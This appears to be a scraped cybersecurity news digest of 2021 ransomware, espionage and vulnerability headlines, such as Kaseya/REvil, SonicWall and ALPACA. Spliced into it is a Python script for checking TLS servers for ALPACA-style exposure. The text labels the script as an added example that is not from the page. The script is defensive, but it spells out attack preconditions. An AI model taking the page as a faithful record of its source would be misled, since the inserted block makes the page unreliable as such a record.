Networking equipment maker SonicWall is alerting customers of an "imminent" ransomware campaign targeting its Secure Mobile Access (SMA) 100 series and Secure Remote Access (SRA) products running unpatched and end-of-life 8.x firmware. The warning comes more than a month after reports emerged that remote access vulnerabilities in SonicWall SRA 4600 VPN appliances (CVE-2019-7481) are being exploited as an initial access vector for ransomware attacks to breach corporate networks worldwide. "SonicWall has been made aware of threat actors actively targeting Secure Mobile Access (SMA) 100 series and Secure Remote Access (SRA) products running unpatched and end-of-life (EOL) 8.x firmware in an imminent ransomware campaign using stolen credentials," the company said. "The exploitation targets a known vulnerability that has been patched in newer versions of firmware." SMA 1000 series products are not affected by the flaw, SonicWall noted, urging businesseThe Hacker News
July 14, 2021
BazarBackdoor sneaks in through nested RAR and ZIP archives Full Text
Abstract
Security researchers caught a new phishing campaign that tried to deliver the BazarBackdoor malware by using the multi-compression technique and masking it as an image file.BleepingComputer
July 14, 2021
AttackIQ raises $44M to fuel global growth and vision of security optimization Full Text
Abstract
AttackIQ announced a $44 million Series C funding round led by Atlantic Bridge. Kevin Dillon, Co-Founder and Managing Partner at Atlantic Bridge, also joined the company's Board of Directors.Help Net Security
July 14, 2021
Google: Russian SVR hackers targeted LinkedIn users with Safari zero-day Full Text
Abstract
Google security researcher shared more information on four security vulnerabilities also known as zero-days, unknown before they discovered them being exploited in the wild earlier this year.BleepingComputer
July 14, 2021
Trickbot improves its VNC module in recent attacks Full Text
Abstract
Trickbot botnet is back, its authors implemented updates for the VNC module used for remote control of infected systems. The Trickbot botnet continues to evolve despite the operations conducted by law enforcement aimed at dismantling it. The authors...Security Affairs
July 13, 2021
Hackers use new SolarWinds zero-day to target US Defense orgs Full Text
Abstract
China-based hackers actively target US defense and software companies using a vulnerability in the SolarWinds Serv-U FTP server.BleepingComputer
July 13, 2021
Chinese Hackers Exploit Latest SolarWinds 0-Day to Target U.S. Defense Firms Full Text
Abstract
Microsoft on Tuesday disclosed that the latest string of attacks targeting SolarWinds Serv-U managed file transfer service with a now-patched remote code execution (RCE) exploit is the handiwork of a Chinese threat actor dubbed "DEV-0322." The revelation comes days after the Texas-based IT monitoring software maker issued fixes for the flaw that could enable adversaries to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads or view and alter sensitive data. Tracked as CVE-2021-35211, the RCE flaw resides in Serv-U's implementation of the Secure Shell (SSH) protocol. While it was previously revealed that the attacks were limited in scope, SolarWinds said it's "unaware of the identity of the potentially affected customers." Attributing the intrusions with high confidence to DEV-0322 (short for "Development Group 0322") based on observed victimology, tactics, and procedures, MicrThe Hacker News
July 13, 2021
Fashion brand Guess hacked, DarkSide ransomware group the likely culprit Full Text
Abstract
The company’s investigation determined that social security numbers, driver’s license numbers, passport numbers and/or financial account numbers may have been accessed or acquired.SCMagazine
July 10, 2021
Iran’s railroad system was hit by a cyberattack, hackers posted fake delay messages Full Text
Abstract
Iran's railroad system was hit by a cyberattack, hackers posted fake messages about delays or cancellations of the trains on display boards at stations across the country. Iran's railroad system was hit by a cyberattack, threat actors published fake...Security Affairs
July 10, 2021
Ransomware attack hits Swiss consumer outlet Comparis Full Text
Abstract
Comparis said its website - which lets consumers compare prices for goods and services - was working normally again, but access via e-mail and customer hotline may still be limited as it works with cybersecurity specialists on a complete recovery.Reuters
July 09, 2021
Ukraine says Russian-linked hackers attacked its navy’s website Full Text
Abstract
Ukraine said Friday that it believes Russian-linked hackers were responsible for hacking the Ukrainian navy's website and publishing a series of fake reports about its ongoing Sea Breeze military drills taking place in the Black Sea.The Hill
July 9, 2021
Kaseya attack spotlights potential gaps in managed service provider model Full Text
Abstract
Where are the failures in vendor and MSP relationships that could introduce risks, and what tactics could help close the gaps? SC Media spoke to supply chain experts to examine the complexities.SCMagazine
July 8, 2021
Year-long spear-phishing campaign targets global energy industry Full Text
Abstract
Many of the spear-phishing emails show the threat actor did their homework, with procurement jargon and references to real executives and ongoing projects.SCMagazine
July 8, 2021
Online course provider Coursera hit with API issues, with cloud driving additional exposure Full Text
Abstract
APIs have been around for years, but the adoption of cloud and cloud services is a leading driver behind their explosive use recently, enabling attackers to elevate privileges and move laterally throughout networks.SCMagazine
July 08, 2021
REvil victims are refusing to pay after flawed Kaseya ransomware attack Full Text
Abstract
The REvil ransomware gang's attack on MSPs and their customers last week outwardly should have been successful, yet changes in their typical tactics and procedures have led to few ransom payments.BleepingComputer
July 8, 2021
Oil & Gas Targeted in Year-Long Cyber-Espionage Campaign Full Text
Abstract
A global effort to steal information from energy companies is using sophisticated social engineering to deliver Agent Tesla and other RATs.Threatpost
July 08, 2021
Experts Uncover Malware Attacks Targeting Corporate Networks in Latin America Full Text
Abstract
Cybersecurity researchers on Thursday took the wraps off a new, ongoing espionage campaign targeting corporate networks in Spanish-speaking countries, specifically Venezuela, to spy on its victims. Dubbed "Bandidos" by ESET owing to the use of an upgraded variant of Bandook malware, the primary targets of the threat actor are corporate networks in the South American country spanning across manufacturing, construction, healthcare, software services, and retail sectors. Written in both Delphi and C++, Bandook has a history of being sold as a commercial remote access trojan (RAT) dating all the way back to 2005. Since then, numerous variants have emerged on the threat landscape and put to use in different surveillance campaigns in 2015 and 2017, allegedly by a cyber-mercenary group known as Dark Caracal on behalf of government interests in Kazakhstan and Lebanon. In a continuing resurgence of the Bandook Trojan, Check Point last year disclosed three new samples — oneThe Hacker News
July 8, 2021
‘Apex predators’: Why the Kaseya ransomware attack has experts worried Full Text
Abstract
The REvil gang used a level of planning and sophistication closer to high-level, government-backed hackers, rather than a mere criminal operation, several cybersecurity experts say.NBC News
July 8, 2021
India: SBI Customers Being Targeted by an OTP Scam Full Text
Abstract
The research wing of New Delhi-based think tank CyberPeace Foundation, along with Autobot Infosec Pvt Ltd, studied two such incidents on the name of SBI that were faced by some smartphone users.The Times Of India
July 7, 2021
Wiregrass Electric Cooperative hit by a ransomware attack Full Text
Abstract
Wiregrass Electric Cooperative, a rural Alabama electric cooperative was hit by a ransomware attack. Wiregrass Electric Cooperative, a rural Alabama electric cooperative that serves about 25,000 members, was hit by a ransomware attack. The cyberattack...Security Affairs
July 7, 2021
Phishing campaign looks to leverage Kaseya VSA fears Full Text
Abstract
A phishing campaign is taking advantage of Kaseya VSA customers eagerly awaiting a patch for the beleaguered remote monitoring and management application.SCMagazine
July 7, 2021
Kaseya Ransomware Attack Used to Fuel Malspam Campaign Full Text
Abstract
In a series of tweets from Malwarebytes, researchers have disclosed that a malspam campaign is taking advantage of the Kaseya ransomware attack to drop Cobalt Strike.Cyware Alerts - Hacker News
July 07, 2021
Tens of thousands scammed using fake Android cryptomining apps Full Text
Abstract
Scammers tricked at least 93,000 people into buying fake Android cryptocurrency mining applications, as revealed by researchers from California-based cybersecurity firm Lookout.BleepingComputer
July 6, 2021
Attackers Accelerating Ransomware Attacks on ICS Networks Full Text
Abstract
Ransomware attacks are evolving rapidly to target ICS endpoints worldwide with a significant rise in activity during the past year. Four ransomware families, namely Ryuk, Nefilim, REvil, and LockBit, account for over half of these attacks, a new Trend Micro report says.Cyware Alerts - Hacker News
July 6, 2021
WEC: No data compromised in ransomware attack Full Text
Abstract
While a ransomware attack was launched against the Alabama-based Wiregrass Electric Cooperative during the weekend, officials have verified that no data have been compromised.WTVY
July 6, 2021
Healthcare Ransomware Attack Impacts Practice Management Software Vendor PracticeFirst Full Text
Abstract
Apart from PII, diagnoses, lab and treatment information, health insurance details, employee usernames and passwords, bank account information, and tax identification numbers were exposed.HealthITSecurity
July 06, 2021
Kaseya: Roughly 1,500 businesses hit by REvil ransomware attack Full Text
Abstract
Kaseya says the REvil supply-chain ransomware attack breached the systems of roughly 60 of its direct customers using the company's VSA on-premises product.BleepingComputer
July 06, 2021
Kaseya Rules Out Supply-Chain Attack; Says VSA 0-Day Hit Its Customers Directly Full Text
Abstract
U.S. technology firm Kaseya, which is firefighting the largest ever supply-chain ransomware strike on its VSA on-premises product, ruled out the possibility that its codebase was unauthorizedly tampered with to distribute malware. While initial reports raised speculations that the ransomware gang might have gained access to Kaseya's backend infrastructure and abused it to deploy a malicious update to VSA servers running on client premises, in a modus operandi similar to that of the devastating SolarWinds hack, it has since emerged that a never-before-seen security vulnerability (CVE-2021-30116) in the software was leveraged to push ransomware to Kaseya's customers. "The attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution," the Miami-headquartered company noted in the incident analysis. "This allowed the attackers to leverage the standard VSA product functionality to deplThe Hacker News
July 6, 2021
Kaseya Counts Up to 1,500 Businesses Affected by Ransomware Attack Full Text
Abstract
Between 800 and 1,500 businesses around the world have been affected by a ransomware attack centered on U.S. information technology firm Kaseya, its chief executive said on Monday.Reuters
July 5, 2021
The Kaseya Ransomware Attack is a Really Big Deal Full Text
Abstract
If you’re not already paying attention to the Kaseya ransomware incident, you should be.Lawfare
July 5, 2021
Kaseya Attack Fallout: CISA, FBI Offer Guidance Full Text
Abstract
Following a brazen ransomware attack by the REvil cybergang, CISA and FBI offer guidance to victims.Threatpost
July 5, 2021
Kubernetes Clusters Exploited to Perform Brute Force Attacks Full Text
Abstract
U.S. and U.K. cybersecurity agencies jointly published an alert on a series of large-scale brute-force attacks sponsored by the Russia-linked APT28 group. Users are recommended to change all default credentials and use appropriate network segmentation, restrictions, and automated tools for auditing ...Cyware Alerts - Hacker News
July 5, 2021
REvil’s New Supply Chain Attack Takes Down 1,000s of Businesses Full Text
Abstract
A ransomware attack by REvil group paralyzed the networks of thousands of companies from the U.S. to Sweden. Hackers exploited Kaseya's systems management platform called VSA. The gang has allegedly demanded millions in ransom to restore the data. Organizations are suggested to implement adequ ...Cyware Alerts - Hacker News
July 5, 2021
US water company WSSC Water hit by a ransomware attack Full Text
Abstract
US water company WSSC Water is investigating a ransomware attack that affected non-essential business systems in May. WSSC Water is investigating a ransomware attack that took place on May 24 and that targeted a portion of their network that operates...Security Affairs
July 04, 2021
Kaseya was fixing zero-day just as REvil ransomware sprung their attack Full Text
Abstract
The zero-day vulnerability used to breach on-premise Kaseya VSA servers was in the process of being fixed, just as the REvil ransomware gang used it to perform their massive Friday attack.BleepingComputer
July 3, 2021
‘Turn off your heart’: Kaseya VSA ransomware hits MSPs in a vital organ Full Text
Abstract
The flurry of ransomware attacks starting Friday, targeting on-premises Kaseya VSA applications, is particularly frightening to managed service providers, because they strike at software at the center of the enterprise: the remote monitoring and management (RMM) platform.SCMagazine
July 3, 2021
Kaseya VSA supply-chain ransomware attack hit hundreds of companies Full Text
Abstract
A supply chain attack by REvil ransomware operators against Kaseya VSA impacted multiple managed service providers (MSPs) and their clients. A new supply chain attack made the headlines, this afternoon, the REvil ransomware gang hit the cloud-based MSP platform...Security Affairs
July 03, 2021
Kaseya Supply-Chain Attack Hits Nearly 40 Service Providers With REvil Ransomware Full Text
Abstract
The threat actors behind the REvil ransomware gang appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide, in what's an instance of a widespread supply-chain ransomware attack. "Beginning around mid-day (EST/US) on Friday, July 2, 2021, Kaseya's Incident Response team learned of a potential security incident involving our VSA software," the company's CEO Fred Voccola said in a statement shared late Friday. Following the incident, the IT and security management services company said it took immediate steps to shut down our SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised. Voccola also said the company has identified the source of the vulnerability and that it's readying a patch to mitigate the ongoing issues. In the interim, the company also noted it intends to keep all onThe Hacker News
July 02, 2021
Ransomware attack hits software manager, affecting 200 companies Full Text
Abstract
A Miami-based IT software management company announced Friday that a ransomware attack may have targeted one of its tools used by its clients, potentially affecting some 200 businesses.The Hill
July 02, 2021
REvil ransomware hits 200 companies in MSP supply-chain attack Full Text
Abstract
A massive REvil ransomware attack affects multiple managed service providers and their clients through a reported Kaseya supply-chain attack.BleepingComputer
July 2, 2021
Experts warn of Babuk Locker attacks with recently leaked ransomware builder Full Text
Abstract
The recently leaked Babuk Locker ransomware builder was used by a threat actor in an ongoing campaign targeting victims worldwide. At the end of June, The Record first reported that the builder for the Babuk Locker ransomware was leaked online allowing...Security Affairs
July 1, 2021
Dropbox Used to Mask Malware Movement in Cyberespionage Campaign Full Text
Abstract
The IndigoZebra APT is targeting the Afghan government using Dropbox as an API that leaves no traces of communications with weirdo websites.Threatpost
June 30, 2021
Hackers hit a televised phone-in between President Putin and citizens at a TV show Full Text
Abstract
A massive cyber attack attempted to disrupt a televised phone-in between Russian President Vladimir Putin and the Rossiya 24 network. Hackers launched a massive cyberattack against the state-broadcast Rossiya 24 network while transmitting a show in which...Security Affairs
June 30, 2021
Indexsinas SMB Worm Campaign Infests Whole Enterprises Full Text
Abstract
The self-propagating malware’s attack chain is complex, using former NSA cyberweapons, and ultimately drops cryptominers on targeted machines.Threatpost
June 30, 2021
University Medical Center reports suspicious activity, possible cyberattack Full Text
Abstract
UMC found suspicious activity on its computer network in mid-June. UMC quickly restricted external access to servers and it continues to work with law enforcement to fully investigate the activity.KTNV
June 30, 2021
The “WayBack” Campaign: a Large Scale Operation Hiding in Plain Sight Full Text
Abstract
The campaign was designed to deliver over 900 pieces of malware with highly dangerous capabilities, enabling the threat actor to conduct both digital and environmental monitoring of their victims.Yoroi
June 29, 2021
Threat Actors are Targeting Firewall and VPN Devices Full Text
Abstract
Networking equipment vendor Zyxel has emailed customers to alert them about a cyberattack targeting its high-end enterprise-focused firewall and VPN server products. Attacks against firewalls, VPN servers, and load balancers have become common. Such attacks are becoming prominent and being carried ...Cyware Alerts - Hacker News
June 28, 2021
Nefilim Ransomware Attack Through a MITRE Att&ck Lens Full Text
Abstract
It is operated by a group tracked under the intrusion set "Water Roc". This group combines advanced techniques with legitimate tools to make them harder to detect and respond before it is too late.Trend Micro
June 25, 2021
Attacks against game companies are up. But why? Full Text
Abstract
Malicious hackers are increasingly mobbing the video game industry, but security experts can’t pinpoint a single explanation for the surge.SCMagazine
June 25, 2021
A New Attack on AI-driven Facial Recognition Systems Full Text
Abstract
Researchers developed an attack technique named Adversarial Octopus that could perform a targeted attack on AI-based facial recognition systems. This attack shows that AI systems require much more attention at the security front, and such new attack methods will help raise awareness.Cyware Alerts - Hacker News
June 25, 2021
Watch Out! Zyxel Firewalls and VPNs Under Active Cyberattack Full Text
Abstract
Taiwanese networking equipment company Zyxel is warning customers of an ongoing attack targeting a "small subset" of its security products such as firewall and VPN servers. Attributing the attacks to a "sophisticated threat actor," the firm noted that the attacks single out appliances that have remote management or SSL VPN enabled, namely in the USG/ZyWALL, USG FLEX, ATP, and VPN series running on-premise ZLD firmware, implying that the targeted devices are publicly accessible over the internet. "The threat actor attempts to access a device through WAN; if successful, they then bypass authentication and establish SSL VPN tunnels with unknown user accounts, such as 'zyxel_slIvpn', 'zyxel_ts', or 'zyxel_vpn_test', to manipulate the device's configuration," Zyxel said in an email message, which was shared on Twitter. As of writing, it's not immediately known if the attacks are exploiting previously known vulnerabilitiesThe Hacker News
June 24, 2021
Oh FCUK! Fashion Label, Medical Diagnostics Firm Latest REvil Victims Full Text
Abstract
The infamous ransomware group hit two big-name companies within hours of each other.Threatpost
June 24, 2021
Zyxel says a threat actor is targeting its enterprise firewall and VPN devices Full Text
Abstract
Zyxel has emailed customers this week to alert them about a series of attacks that have been targeting some of the company’s high-end enterprise-focused firewall and VPN server products.The Record
June 24, 2021
Zyxel warns customers of attacks on its enterprise firewall and VPN devices Full Text
Abstract
Networking equipment giant Zyxel warns customers of a series of attacks that have been targeting some of its enterprise firewall and VPN devices. Networking equipment vendor Zyxel warned its customers of a series of attacks that have been targeting...Security Affairs
June 24, 2021
Cyberattack at IT Service Provider InfoSolutions Impacts Swedish COVID-19 Testing Lab Full Text
Abstract
Even though the motive behind the breach is not clear, local media reports that it is suspected to be a warning shot from hackers as the little noticeable damage has yet to come out from the breach.Cyber News
June 23, 2021
Healthcare giant Grupo Fleury hit by REvil ransomware attack Full Text
Abstract
Brazilian medical diagnostic company Grupo Fleury has suffered a ransomware attack that has disrupted business operations after the company took its systems offline.BleepingComputer
June 23, 2021
Healthcare giant Grupo Fleury hit by alleged REvil ransomware attack Full Text
Abstract
Brazilian medical diagnostic company Grupo Fleury has suffered a ransomware attack that has disrupted business operations after the company took its systems offline.BleepingComputer
June 23, 2021
Ireland: Three quarters of HSE IT servers decrypted following crippling cyberattack Full Text
Abstract
At least 75% of the HSE’s IT servers have been decrypted and 70% of the health service’s computer devices have been restored to use following a cyber attack nearly six weeks ago.The Journal
June 22, 2021
Lawsuits filed against Scripps Health following ransomware attack, data theft Full Text
Abstract
Noteworthy is that Scripps maintained open transparency and communication for each step of recovery after a ransomware attack exposed protected health information of 150,000 patients – a decision that is actually not required under HIPAA.SCMagazine
June 22, 2021
ADVERSARIAL OCTOPUS – ATTACK DEMO FOR AI-DRIVEN FACIAL RECOGNITION ENGINE Full Text
Abstract
Researchers from Adversa devised an attack technique, dubbed ADVERSARIAL OCTOPUS, against Facial Recognition systems. THE INTENTION BEHIND THIS PROJECT Driven by our mission to increase trust in AI, Adversa’s AI Red Team is constantly exploring...Security Affairs
June 22, 2021
A ransomware attack disrupted the IT network of the City of Liege Full Text
Abstract
The Belgian city of Liege has suffered today a ransomware attack that has disrupted the IT network of the municipality and its online services. Liege, one of the biggest cities in Belgium, was hit by a ransomware attack that has disrupted the IT network...Security Affairs
June 22, 2021
Cyberattack on Polish government officials linked to Russian hackers Full Text
Abstract
A recent string of cyberattacks targeted at thousands of Polish email users, including government officials, has been linked by the Polish intelligence services to a Russian hacking group.The Hill
June 21, 2021
Water Sector Security Report Released Just as Another Water Plant Hack Comes to Light Full Text
Abstract
The organization in April surveyed 606 individuals working at water and wastewater utilities in the U.S. to get a better understanding of the sector in terms of cybersecurity.Security Week
June 21, 2021
Threat actors in January attempted to poison the water at a US facility Full Text
Abstract
Threat actors in January attempted to poison the water at a US facility, a circumstance that highlights the importance of cybersecurity for water and wastewater utilities...Security Affairs
June 20, 2021
Poland: The leader of the PiS party blames Russia for the recent attack Full Text
Abstract
Jaroslaw Kaczynski, the leader of Poland's Law and Justice party (PiS), blames Russia for the recent cyberattack targeting top Polish politicians...Security Affairs
June 19, 2021
Cyber attack on Polish officials came from Russia, Kaczynski says Full Text
Abstract
Top Polish government officials have been hit by a far-reaching cyber attack conducted from Russian territory, Poland's de facto leader Jaroslaw Kaczynski said on Friday in his first official statement on an email hacking incident this month.Reuters
June 18, 2021
Freeport town computer network back up following ransomware attack Full Text
Abstract
The town’s municipal computer network is back up and running after a cyberattack one week ago that has been linked to Russian criminals and a global ransomware group, the town manager said Tuesday.Press Herald
June 17, 2021
Geek Squad Vishing Attack Bypasses Email Security to Hit 25K Mailboxes Full Text
Abstract
An email campaign asking victims to call a bogus number to suspend supposedly fraudulent subscriptions got right past Microsoft’s native email controls.Threatpost
June 17, 2021
Ryuk ransomware recovery cost us $8.1m and counting, says Baltimore school authority Full Text
Abstract
An organisation whose network was infected by Ryuk ransomware has spent $8.1m over seven months recovering from it – and that’s still not the end of it, according to US news reports.The Register
June 17, 2021
UK’s Gateley Says Cyberattack Affects Small Portion of Its Data Full Text
Abstract
The commercial legal services firm said it had informed relevant regulators and law enforcement agencies along with the country's Information Commissioner's office about the breach.US News
June 16, 2021
Poland institutions and individuals targeted by an unprecedented series of cyber attacks Full Text
Abstract
Poland's government announced that it was targeted by an 'unprecedented' series of cyberattacks against institutions and individuals. Poland's parliament held a closed-door session to discuss the unprecedented wave of cyberattacks that...Security Affairs
June 16, 2021
New threat intel framework takes aim at bot-fueled business logic attacks Full Text
Abstract
BLADE addresses scenarios in which bots exploit apps and websites – using them as they were intended, but for malicious purposes like credential stuffing and account takeovers.SCMagazine
June 16, 2021
Health care ransomware attacks: Oklahoma health system driven to EHR downtime Full Text
Abstract
The incident is the latest in what appears to be another ransomware wave, after a previous onslaught of attacks and EHR outages in the fall of 2020.SCMagazine
June 16, 2021
Malware Attack on South Korean Entities Was Work of Andariel Group Full Text
Abstract
A malware campaign targeting South Korean entities that came to light earlier this year has been attributed to a North Korean nation-state hacking group called Andariel, once again indicating that Lazarus attackers are following the trends and their arsenal is in constant development. "The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity," Russian cybersecurity firm Kaspersky said in a deep-dive published Tuesday. Victims of the attack are in the manufacturing, home network service, media, and construction sectors. Designated as part of the Lazarus constellation, Andariel is known for unleashing attacks on South Korean organizations and businesses using specifically tailored methods created for maximum effectiveness. In September 2019, the sub-group, along with Lazarus and Bluenoroff, was sanctioned by the U.S. Treasury Department for their malicious cyber activity on critical infrastructure. ...The Hacker News
June 15, 2021
Fujifilm restores operations after recent ransomware attack Full Text
Abstract
Japanese multinational conglomerate Fujifilm announced that it has restored operations following the recent ransomware attack. On June 4, the company announced that it had been hit by a ransomware attack and shut down...Security Affairs
June 15, 2021
Verizon, water agency targeted in Chinese cyber espionage campaign: report Full Text
Abstract
Verizon and one of the country’s largest water agencies were reportedly included among the groups targeted in the hacking of Pulse Connect Secure devices, a hack blamed on China that came to light in April.The Hill
June 15, 2021
No Two REvil Attacks Are the Same, Experts Warn Full Text
Abstract
The ransomware affiliate model drives a challenging variety of threats for defenders to tackleInfosecurity Magazine
June 14, 2021
REvil ransomware hits US nuclear weapons contractor Full Text
Abstract
US nuclear weapons contractor Sol Oriens has suffered a cyberattack allegedly at the hands of the REvil ransomware gang, which claims to be auctioning data stolen during the attack.BleepingComputer
June 14, 2021
NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers Full Text
Abstract
A new cyber espionage group named Gelsemium has been linked to a supply chain attack targeting the NoxPlayer Android emulator that was disclosed earlier this year. The findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename Operation TooHash based on malware payloads deployed in those intrusions. "Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities," cybersecurity firm ESET said in an analysis published last week. "Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand." Targeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, Saudi ...The Hacker News
June 14, 2021
REvil Claims Responsibility for Invenergy Hack Full Text
Abstract
Ransomware group that attacked JBS says it also hacked Chicago-based clean energy companyInfosecurity Magazine
June 14, 2021
Fujifilm resumes normal operations after ransomware attack Full Text
Abstract
Japanese multinational conglomerate Fujifilm says that it has resumed normal business and customer operations following a ransomware attack that forced it to shut the entire network on June 4.BleepingComputer
June 12, 2021
Details Emerge on How Gaming Giant EA Was Hacked Full Text
Abstract
The group stole the source code for FIFA 21 and related tools that match players with other players, as well as the source code for the Frostbite engine that powers games like Battlefield and other internal game development tools.Dark Reading
June 12, 2021
Ransomware attack hit Teamsters in 2019 — but they refused to pay Full Text
Abstract
Unlike many of the companies hit by high-profile ransomware attacks in recent months, the union declined to pay, despite the FBI's advice to do so, three sources familiar with the previously unreported cyberattack told NBC News.NBC News
June 11, 2021
Motives for ransomware attack against nuclear contractor Sol Oriens remain unclear Full Text
Abstract
Sol Oriens’ work around nuclear weapons raises concerns about the implications of a ransomware attack, though most experts still believe the motivations are financial.SCMagazine
June 11, 2021
Teamsters refused to pay a ransomware attack in 2019 Full Text
Abstract
The Teamsters labor union was hit with a ransomware attack in 2019 but refused to pay the seven-figure payment demanded by hackers, despite being advised by the FBI to do so, a Teamsters spokesperson confirmed to The Hill.The Hill
June 11, 2021
Monumental Supply-Chain Attack on Airlines Traced to State Actor Full Text
Abstract
Airlines are warned to scour their networks for traces of the campaign, likely the work of APT41, which may still be lurking inside them.Threatpost
June 11, 2021
Gelsemium Group Linked to NoxPlayer Supply-Chain Attack Full Text
Abstract
Experts took the wraps off of activities of Gelsemium APT, which uses state-of-the-art supply chain attack techniques against targets, including electronics manufacturers, in East Asia and the Middle East. Its attack strategy indicates that the group is predetermined about its targets and cou ...Cyware Alerts - Hacker News
June 11, 2021
REvil Hits US Nuclear Weapons Contractor: Report Full Text
Abstract
“We hereby keep a right (sic) to forward all of the relevant documentation and data to military agencies of our choise (sic)” REvil reportedly wrote.Threatpost
June 11, 2021
Diving Into the Roots of the Relentless Ransomware Catastrophe Full Text
Abstract
The REvil ransomware gang recently attacked JBS, the world’s largest meat processing company. The attack forced the company to shut down its Australian and North American IT systems.Cyware Alerts - Hacker News
June 11, 2021
Al Jazeera detected and blocked disruptive cyberattacks Full Text
Abstract
Qatari government-funded international Arabic news channel Al Jazeera announced that it has blocked a series of disruptive cyberattacks aimed at its news publishing platform...Security Affairs
June 10, 2021
Foodservice supplier Edward Don hit by a ransomware attack Full Text
Abstract
Foodservice supplier Edward Don has suffered a ransomware attack that has caused the company to shut down portions of the network to prevent the attack's spread.BleepingComputer
June 10, 2021
‘Nameless’ malware attacks 1.2TB database in the cloud Full Text
Abstract
The malware exfiltrated 6 million files that it grabbed from Desktop and Downloads folders. Screenshots taken by the malware revealed that it spread via pirated Adobe Photoshop software, Windows cracking tools, and pirated games.SCMagazine
June 09, 2021
New TLS Attack Lets Attackers Launch Cross-Protocol Attacks Against Secure Sites Full Text
Abstract
Researchers have disclosed a new type of attack that exploits misconfigurations in transport layer security (TLS) servers to redirect HTTPS traffic from a victim's web browser to a different TLS service endpoint located on another IP address to steal sensitive information. The attacks have been dubbed ALPACA, short for "Application Layer Protocol Confusion - Analyzing and Mitigating Cracks in TLS Authentication," by a group of academics from Ruhr University Bochum, Münster University of Applied Sciences, and Paderborn University. "Attackers can redirect traffic from one subdomain to another, resulting in a valid TLS session," the study said. "This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer." TLS is a cryptographic protocol underpinning several application layer protocols like HTTPS, SMTP, IMAP, POP3, and FTP to secure ...The Hacker News
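The preconditions ALPACA describes can be checked against a TLS service inventory before an attacker does. The script below is an added example, not code from the ALPACA paper or from this page: it models each endpoint's certificate names and whether the service aborts a handshake on an unexpected SNI or on a missing or mismatched ALPN protocol, then reports which HTTPS origins a non-HTTP service on the same (or a wildcard) certificate could stand in for. The inventory, the strict_sni and strict_alpn fields and the example.com names are this example's own constructions; the hostname matching follows the RFC 6125 wildcard rule (one left-most label only).

```python
"""ALPACA-style exposure check over a TLS service inventory.

Added example, not code from the ALPACA paper. The inventory at the bottom is
constructed. An HTTPS origin is exposed when some non-HTTP TLS service on the
same certificate (or a wildcard covering the origin) would accept a browser's
handshake: the certificate validates for the origin's hostname, the service
does not reject the browser's SNI, and it does not insist on its own ALPN.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class TlsService:
    host: str                  # DNS name clients use for this service
    port: int
    protocol: str              # 'https', 'smtp', 'imap', 'pop3', 'ftp'
    cert_names: tuple          # SAN dNSName entries on the presented certificate
    strict_sni: bool = False   # aborts the handshake when server_name is not one it serves
    strict_alpn: bool = False  # aborts the handshake unless its own protocol is negotiated


def san_matches(pattern: str, hostname: str) -> bool:
    """RFC 6125 style matching: case-insensitive; a wildcard is allowed only as the
    entire left-most label and matches exactly one label, so '*.example.com'
    matches 'www.example.com' but neither 'example.com' nor 'a.b.example.com'."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if pattern == hostname:
        return True
    if not pattern.startswith("*."):
        return False
    labels = hostname.split(".")
    if len(labels) < 3:
        return False
    return ".".join(labels[1:]) == pattern[2:]


def alpaca_exposures(inventory: list) -> list:
    """Return one record per (HTTPS origin, substitute service) pair that satisfies
    the confusion preconditions, naming the control that would have blocked it."""
    origins = [s for s in inventory if s.protocol == "https"]
    others = [s for s in inventory if s.protocol != "https"]
    findings = []
    for web in origins:
        for svc in others:
            # 1. The browser validates the substitute's certificate against the origin's
            #    hostname; if no SAN matches, the handshake fails and there is no attack.
            if not any(san_matches(n, web.host) for n in svc.cert_names):
                continue
            # 2. Strict SNI helps only when the origin's name is not one the substitute
            #    serves itself: the browser sends the origin's hostname as server_name.
            same_host = svc.host.lower() == web.host.lower()
            if svc.strict_sni and not same_host:
                continue
            # 3. Strict ALPN always helps: browsers offer h2/http/1.1, never a mail or FTP id.
            if svc.strict_alpn:
                continue
            findings.append({
                "origin": f"{web.host}:{web.port}",
                "substitute": f"{svc.host}:{svc.port} ({svc.protocol})",
                "missing_controls": ["ALPN"] if same_host else ["ALPN", "SNI"],
            })
    return findings


# Constructed inventory for the example (reserved example.com / example.net names).
INVENTORY = [
    TlsService("www.example.com", 443, "https", ("*.example.com",)),
    TlsService("mail.example.com", 25, "smtp", ("*.example.com",)),                     # exposed: shared wildcard, no checks
    TlsService("ftp.example.com", 990, "ftp", ("*.example.com",), strict_sni=True),      # blocked: rejects www.example.com SNI
    TlsService("www.example.com", 993, "imap", ("www.example.com",), strict_sni=True),   # exposed: same host, SNI cannot help
    TlsService("mail.example.com", 587, "smtp", ("*.example.com",), strict_alpn=True),   # blocked: requires its own ALPN id
    TlsService("mail.example.net", 995, "pop3", ("mail.example.net",)),                  # unrelated certificate
]

if __name__ == "__main__":
    for finding in alpaca_exposures(INVENTORY):
        print(finding)
```

Run against a real estate, the inventory would come from a certificate scan of every TLS port, and the two boolean fields from probing each service with a foreign SNI and a browser-style ALPN list. The findings list is also the remediation order: enforce ALPN on every non-HTTP TLS service, enforce SNI where the hostname differs, and stop sharing one wildcard certificate between the web tier and mail or FTP.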
June 09, 2021
Crypto-Mining Attacks Targeting Kubernetes Clusters via Kubeflow Instances Full Text
Abstract
